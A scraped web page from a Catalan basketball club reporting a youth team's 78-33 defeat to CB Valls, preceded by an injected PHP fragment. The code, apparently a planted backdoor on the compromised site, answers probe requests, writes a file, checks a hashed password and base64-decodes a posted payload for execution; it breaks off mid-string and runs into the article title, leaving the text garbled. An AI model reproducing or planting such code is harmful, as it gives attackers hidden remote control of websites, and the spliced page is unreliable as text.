function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí 03 A naufraga al Joana Ballart (78-33) - Tgn Bàsquet Club -

El cadet masculí 03 A naufraga al Joana Ballart (78-33)

Updated: febrer 12, 2019

Una derrota sense paliatius. El cadet masculí 03 A va fer el pitjor partit de la temporada i va ser una joguina en mans del CB Valls que el va superar per complet, especialment en la segona meitat. Després d’un primer període força competit però amb avantatge local, i d’un segon quart encara més ajustat (33-23 al descans), els nois que entrena Javier García van desaparèixer de la pista. Les errades, moltes d’elles incomprensibles a l’hora de llençar a cistella (entrades o fins i tot contraatacs) van afectar la moral dels liles que van perdre qualsevol intensitat en el joc.

La defensa molt intensa dels locals encara va posar més llenya al foc. Després del descans, els vallencs van dominar per complet, de dalt a baix, recuperant una pilota rere una altra i anotant gairebé sense oposició. Els balanços defensius del TGN Bàsquet no van ser gens bons i la diferència en el marcador final és una mostra del mal partit lila.